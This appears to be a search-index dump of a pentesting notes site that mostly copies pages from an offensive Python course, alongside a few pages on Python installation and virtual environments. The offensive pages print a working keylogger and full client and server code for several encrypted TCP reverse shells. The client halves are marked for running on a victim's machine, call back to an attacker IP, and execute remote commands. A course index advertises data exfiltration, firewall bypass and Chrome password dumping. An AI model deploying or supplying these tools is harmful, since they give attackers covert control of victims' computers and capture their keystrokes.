                                  sudo make altinstall\n

                                  If you want to replace your current version of Python with this new version, you should uninstall your current Python package using your package manager (such as apt or dnf) and then install:

                                  sudo make install\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#installing-pip","title":"Installing pip","text":"
                                  python3 -m pip install pip\n

                                  If you get error: externally-managed-environment, then the solution is create an environment. As the message explains, this is actually not an issue with Python itself, but rather your Linux distribution (Kali, Debian, etc.) implementing a deliberate policy to ensure you don't break your operating system and system packages by using pip (or Poetry, Hatch, PDM or another non-OS package manager) outside the protection of a virtual environment.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#creating-a-virtual-environment","title":"Creating a virtual environment","text":"

                                  See virtual Environments.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-installation/#switch-python-versions","title":"Switch python versions","text":"

                                  See pyenv.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-keylogger/","title":"Simple keylogger in python","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n#Ref: https://pythonhosted.org/pynput/keyboard.html#monitoring-the-keyboard\n\nfrom pynput.keyboard import Key, Listener\n\ndef on_press(key):\n    fp=open(\"keylogs.txt\",\"a\") #create a text file and append the key in it\n    print(key)\n    fp.write(str(key)+\"\\n\")\n    fp.close()\n\nwith Listener(on_press=on_press) as listener: # if key is pressed, call on_press function\n    listener.join()\n
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/python-tools-for-pentesting/","title":"Python tools for pentesting","text":"

                                  Tools and techniques to achieve:

                                  • Coding your own reverse shell (TCP+HTTP).
                                  • Exfiltrating data from victim's machine.
                                  • Using anonymous shell by abusing Twitter, Google Form and Sourceforge.
                                  • Hacking passwords with different techniques: code a Keylogger, perform Clipboard Hijacking.
                                  • Bypassing some firewall by including cryptography encryption in your script shells (AES,RSA,XOR)
                                  • Writing scripts to perform privilege escalation on windows by abusing a weak service. And more.
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#contents","title":"Contents","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#tools","title":"Tools","text":"","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#pyinstaller","title":"pyinstaller","text":"

                                  PyInstaller bundles a Python application and all its dependencies into a single package. The user can run the packaged app without installing a Python interpreter or any modules.

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#py2exe","title":"py2exe","text":"

                                  This setup file will convert the python script scsiaccess.py into an exe file:

                                  from distutils.core import setup\nimport py2exe, sys, os\n\nsys.arg.append(\"py2exe\")\nsetup(\n      options = {'py2exe': {'bundle_files': 1}},\n      windows = [ {'script': \"scsiaccess.py\"}],\n      zipfule = None\n)\n
                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-tools-for-pentesting/#inmunity-debuger","title":"Inmunity Debuger","text":"

                                  See Inmunity Debugger.

                                  ","tags":["python","python pentesting","scripting"]},{"location":"python/python-virtual-environments/","title":"Virtual environments","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#virtualenvwrapper","title":"virtualenvwrapper","text":"","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#installation","title":"Installation","text":"
                                  # Make sure you have pip installed.\nsudo apt-get install python3-pip\n\n# Installing virtualenvwrapper\u00a0\nsudo pip3 install virtualenvwrapper\n\n# Open bashrc by \u2013\nsudo gedit ~/.bashrc\n\n# After opening it, add the following \u00a0lines to it :\n\nexport WORKON_HOME=$HOME/.virtualenvs\nexport PROJECT_HOME=$HOME/Devel\nsource /usr/local/bin/virtualenvwrapper.sh\n
                                  ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#basic-usage","title":"Basic usage","text":"
                                  # Creating a virtual environment with mkvirtualenv\nmkvirtualenv nameOfEnvironment\n\n# List exisiting environment in your \nlsvirtualenv -b\n\n# Work on an environment\nworkon nameOfEnvironment\n\n# Close current environment\ndeactivate\n\n# Delete virtual environment\nrmvirtualenv nameOfEnvironment\n\n# To work on another version of python:\nmkvirtualenv -p python3.x venv_name\n# You will see something like this: (venv_name)\n

                                  Backing up virtual environment before removing it:

                                  pip freeze > requirements.txt\n
                                  ","tags":["database","relational","database","SQL"]},{"location":"python/python-virtual-environments/#venv","title":"venv","text":"
                                  python3 -m venv <DIR>\nsource <DIR>/bin/activate\n

                                  Now you can activate or deactivate the virtual environment with:

                                  <DIR>\\Scripts\\activate\n
                                  ","tags":["database","relational","database","SQL"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/","title":"TCP reverse shell with AES encryption","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

                                  from Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport socket\nimport subprocess\nkey = b\"H\" * 32\nIV = b\"H\" * 16\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = decrypt(s.recv(1024))\n        if 'terminate' in command.decode():\n             break\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stderr=subprocess.PIPE, stdin=subprocess.PIPE, stdout=subprocess.PIPE)\n            s.send(encrypt(CMD.stdout.read()))\n\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#server-side","title":"Server side","text":"
                                  import socket\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16 # this must match the block size, which is 16 byte\nkey = b\"H\" * 32 # 32 goes for AES 256\n\ndef encrypt(message):\n    encryptor = AES.new(key, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16) # pad function is to add the necessary extra data to make sure that the size of the padded_message is 16 bytes or a multiple of 16. This is explained because cipher block chaining encryption uses blocks of 16bytes.\n    encrypted_message = encryptor.encrypt(padded_message) \n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message, 16)\n    return decrypted_message\n\ndef connect():\n\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    conn, address = s.accept()\n    print('[+] We got a connection')\n    while True:\n\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send(encrypt(b'terminate'))\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            print(decrypt(conn.recv(1024)).decode())\ndef main():\n    connect()\n\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-aes-encryption/#test","title":"Test","text":"
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nkey = b\"H\" * 32 #AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long.\nIV = b\"H\" * 16\n\ncipher = AES.new(key, AES.MODE_CBC, IV)\n\nmessage = \"Hello\"\npaddedmessage = Padding.pad(message.encode(), 16)\nencrypted = cipher.encrypt(paddedmessage)\n\nprint (encrypted)\n\n\ndecipher = AES.new(key, AES.MODE_CBC, IV)\npaddeddecrypted = decipher.decrypt(encrypted)\nunpaddedencrypted = Padding.unpad(paddeddecrypted, 16)\n\nprint(unpaddedencrypted.decode())\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/","title":"TCP reverse shell with hybrid encryption AES + RSA","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

                                  import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\n\nIV = b\"H\" * 16\n\ndef GET_AES(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\n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\n-----END RSA PRIVATE KEY-----'''\n    private_key = RSA.importKey(privatekey)\n    decryptor = PKCS1_OAEP.new(private_key)\n    return decryptor.decrypt(cipher).decode()\n\n\ndef encrypt(message):\n    encryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(AES_KEY, AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    global AES_KEY\n    AES_KEY = s.recv(1024)\n    AES_KEY = GET_AES(AES_KEY)\n    AES_KEY = AES_KEY.encode()\n    print(AES_KEY)\n\n    while True:\n        command = s.recv(1024)\n\n        command = decrypt(command).decode()\n        print (command)\n        if 'terminate' in command:\n            s.close()\n            break\n        else:\n            CMD = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)\n            result = CMD.stdout.read()\n            s.send(encrypt(result))\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-hybrid-encryption-rsa-aes/#server-side","title":"Server side","text":"
                                  import socket\nfrom Cryptodome.PublicKey import RSA\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.Cipher import AES\nfrom Cryptodome.Util import Padding\nimport string\nimport random\n\nIV = b\"H\" * 16\n\n\nkey = ''.join(random.choice(string.ascii_lowercase + string.ascii_uppercase + string.digits + '^!\\$%&/()=?{[]}+~#-_.:,;<>|\\\\') for _ in range(0, 32))\n\n\ndef SEND_AES(message):\n    publickey = '''-----BEGIN PUBLIC KEY-----\nMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAt9mjsBED9D/MYnU+W5+6\naP9SS1vgL9X6bThNkGKsZ5ZVfnoK4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVA\nkwZDoQMWTrfZASHmQgB944PfGA7qfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82\nh/85ibOPzQrpwQTjEAs8CJ14YWXAJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJ\npvgZQ/6NixnICLIrFN0YbKZo4A0D3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8su\nBZ/MvqX0WgojWr6hNs1Q8h3LtiSsPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/Y\ngKXdgxUkCikTjRon6Mvh7iWKAtEilQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8Whq\nKTp4dGpB3kUWuN+ltxBr+IYPhpBfMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7\nU928DcglK6IowMmN4McyKuv49YYPd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC\n0FqgSSOGVCIkcHT5wLcALyaXOaO0vhMgWWO233Of33wh/7oHclsc5r44MHlZrNSe\nX2QIHCFU4Mwp1hutIuIKkn5dLt1qmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx\n7CkYI7g81RdcB6jGgbr9W4kCAwEAAQ==\n-----END PUBLIC KEY-----'''\n    public_key = RSA.importKey(publickey)\n    encryptor = PKCS1_OAEP.new(public_key)\n    encryptedData = encryptor.encrypt(message)\n    return encryptedData\n\n\n\n\ndef encrypt(message):\n    encryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    padded_message = Padding.pad(message, 16)\n    encrypted_message = encryptor.encrypt(padded_message)\n    return encrypted_message\n\ndef decrypt(cipher):\n    decryptor = AES.new(key.encode(), AES.MODE_CBC, IV)\n    decrypted_padded_message = decryptor.decrypt(cipher)\n    decrypted_message = Padding.unpad(decrypted_padded_message,\n                                      16)\n    return decrypted_message\n\n\ndef connect():\n    s = socket.socket()\n    s.bind(('192.168.0.152', 8080))\n    s.listen(1)\n    print('[+] Listening for incoming TCP connection on port 8080')\n\n    conn, addr = s.accept()\n    print(key.encode())\n    conn.send(SEND_AES(key.encode()))\n\n    while True:\n        store = ''\n        command = input(\"Shell> \")\n        if 'terminate' in command:\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        else:\n            command = encrypt(command.encode())\n            conn.send(command)\n            result = conn.recv(1024)\n            try:\n                print(decrypt(result).decode())\n            except:\n                print(\"[-] unable to decrypt/receive data!\")\n\nconnect()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","aes","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/","title":"TCP reverse shell with RSA encryption","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
                                    • Tunning the connection attempts.
                                    • Including cd command into TCP reverse shell.
                                  • Advanced scriptable shells:
                                    • Using a Dynamic DNS instead of your bared attacker public ip.
                                    • Making your binary persistent.
                                    • Making a screenshot.
                                    • Coding a reverse shell that searches files.
                                  • Techniques for bypassing filters:
                                    • Coding a reverse shell that scans ports.
                                    • Hickjack the Internet Explorer process to bypass an host-based firewall.
                                    • Bypassing Next Generation Firewalls.
                                    • Bypassing IPS with handmade XOR Encryption.
                                  • Malware and crytography:
                                    • TCP reverse shell with AES encryption.
                                    • TCP reverse shell with RSA encryption.
                                    • TCP reverse shell with hybrid encryption AES + RSA.
                                  • Password Hickjacking:
                                    • Simple keylogger in python.
                                    • Hijacking Keepass Password Manager.
                                    • Dumping saved passwords from Google Chrome.
                                    • Man in the browser attack.
                                    • DNS Poisoning.
                                  • Privilege escalation:
                                    • Weak service file permission.

                                  First, we will generate a pair of keys (private and public) on client side (victim's machine) and on server side (attacker machine).

                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#gen-keys","title":"Gen keys","text":"
                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom Cryptodome.PublicKey import RSA\n\nnew_key = RSA.generate(4096) # generate  RSA key that 4096 bits long\n\n#Export the Key in PEM format, the PEM extension contains ASCII encoding\npublic_key = new_key.publickey().exportKey(\"PEM\")\nprivate_key = new_key.export_key(\"PEM\")\n\npublic_key_file = open(\"public.pem\", \"wb\")\npublic_key_file.write(public_key)\npublic_key_file.close()\n\nprivate_key_file = open(\"private.pem\", \"wb\")\nprivate_key_file.write(private_key)\nprivate_key_file.close()\n\nprint(public_key.decode())\nprint(private_key.decode())\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","encryption","rsa"]},{"location":"python/tcp-reverse-shell-with-rsa-encryption/#rsa-client-side-shell","title":"RSA client side shell","text":"
                                  import subprocess\nimport socket\nfrom Cryptodome.Cipher import PKCS1_OAEP\nfrom Cryptodome.PublicKey import RSA\ndef decrypt(cipher):\n    privatekey = '''-----BEGIN RSA PRIVATE KEY-----\nMIIJKQIBAAKCAgEAt9mjsBED9D/MYnU+W5+6aP9SS1vgL9X6bThNkGKsZ5ZVfnoK\n4BxMBHI5Gi/YtoCJjyAGsWMpxy1fQ+F+ZWVAkwZDoQMWTrfZASHmQgB944PfGA7q\nfn15kDXmCyvzbitRyWvTs1LDDNF7Q/54Qj82h/85ibOPzQrpwQTjEAs8CJ14YWXA\nJnqOC6devaDYKdB7SSlueVtoQ8BxWc3hOJHJpvgZQ/6NixnICLIrFN0YbKZo4A0D\n3yRJIdumZw8uqwEMeIt41ja6zOG3gKtsG8suBZ/MvqX0WgojWr6hNs1Q8h3LtiSs\nPiUP/bTWD9zos8Yr7RuEabesjHlY0qcNzZ/YgKXdgxUkCikTjRon6Mvh7iWKAtEi\nlQlDeBYMGUvFUQ5FMF5LZJ5Q/7+JXulv8WhqKTp4dGpB3kUWuN+ltxBr+IYPhpBf\nMcR97W+NuXDReUiIGFJpVI1m4AeCzz1BdAM7U928DcglK6IowMmN4McyKuv49YYP\nd7TNFjJWc7P6e19V3BsxA5jpCc6Dxp5AM6WC0FqgSSOGVCIkcHT5wLcALyaXOaO0\nvhMgWWO233Of33wh/7oHclsc5r44MHlZrNSeX2QIHCFU4Mwp1hutIuIKkn5dLt1q\nmt2CDUO/uxGbdTf667c9TLYcYWoi/eDBdrVx7CkYI7g81RdcB6jGgbr9W4kCAwEA\nAQKCAgAIZt7PJgfrOpspiLgf0c3gDIMDRKCbLwkxwpfw2EGOvlUL4aHrmf9zWJD5\nfGRH+tnOe6UyqBh5rL4kyQJQue7YiTm/+vcjA83b+mOeco1OP3GLlOrseul6SKxJ\nqGmIiFxFezMCh+64AD7E3bU7Oc5RKr3DaDxTH4ONOZ7y1cCZmDCvKso8N++T4sM2\noUofpxJrRoRw8VdzeTD07K61OhxgEAh/jfuD9tqoYxQK8Quzs2spig66PNtGu9X/\n8batQ/AA9kbAa2HgCRSswajAIGnrAeGGeOkQ0FPLStjtOzbOycPMgCKK+IChlIkP\n0oWj6ZOKU26asjUlekov3kiINBzduF+bGOKGnoxeguSiQE1DtsfXisvADMp53rLN\nRjkzWDTN7l8zqgAd2hPB25Fhy5kKHA1MNqRPeUUIUp++FuYVJ1xNoMR61N6JvLzC\nUTrUZW7mMxqXisccsuU8OdGB2DECP+sS82dWZqoKFZKjza1N5XBSm1f7nCTQqtJq\nkYYA5d4FPJ1wxRKufRTklC6QSHoGm54z0ay4Mh0n08wIiYBRxsgtGk6crhpRfy12\ne6lRU3htQnzc+JDrdZIjoL5lqDfi0wSxdVXAAQXRptsvSXwwt+h/zg9ZmqlsVoE1\nhH7LeVyL31FRF1b2BiX7jyOeeoqZ1gkkNvwyvqnaOos+wGd2/QKCAQEA0aeVV